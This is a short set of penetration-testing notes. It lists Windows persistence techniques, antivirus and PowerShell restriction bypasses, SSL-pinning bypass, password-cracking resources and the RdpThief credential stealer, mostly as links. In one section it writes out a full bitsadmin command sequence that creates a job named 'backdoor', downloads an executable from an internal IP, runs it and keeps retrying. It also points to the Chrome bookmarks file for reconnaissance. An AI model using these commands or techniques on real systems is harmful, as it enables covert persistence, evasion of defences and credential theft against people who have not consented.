0x01 Chrome bookmark export, useful for discovering addresses of internal systems

File location: C:\Users\%username%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks

0x02 Persistence via bitsadmin

bitsadmin /create backdoor
bitsadmin /addfile backdoor "http://10.0.2.21/pentestlab.exe"  "C:\tmp\pentestlab.exe"
bitsadmin /SetNotifyCmdLine backdoor C:\tmp\pentestlab.exe NUL
bitsadmin /SetMinRetryDelay "backdoor" 60
bitsadmin /resume backdoor

0x03 Persistence via netsh

https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/

0x04 Several ways to run PowerShell without powershell.exe

https://www.anquanke.com/post/id/189152

0x05 Several ways to execute .sct files via regsvr32 and bypass Defender

https://www.trustedsec.com/blog/discovering-the-anti-virus-signature-and-bypassing-it/
https://www.freebuf.com/column/164986.html

0x05 A rather unusual persistence technique

https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/

0x06 hashcat GUI and assorted wordlists

https://hashkiller.co.uk/

0x07 Mitigating NTLM relay / SMB signing

https://support.microsoft.com/zh-cn/help/161372/how-to-enable-smb-signing-in-windows-nt

0x08 .NET version of PowerView

https://github.com/tevora-threat/SharpView.git

0x09 Bypassing client-side certificate validation to capture traffic

https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/

0x10 Persistence technique based on the Win32Time service

https://xz.aliyun.com/t/6738

0x11 Running PowerShell under restricted conditions

https://www.cnblogs.com/-qing-/p/10620717.html
Unmanaged PowerShell

Speeding up PowerShell execution

Get-Process -name powershell | foreach { $_.PriorityClass = "High" }

RDP Thief

https://github.com/0x09AL/RdpThief.git

Tested it today on Win7; it works well.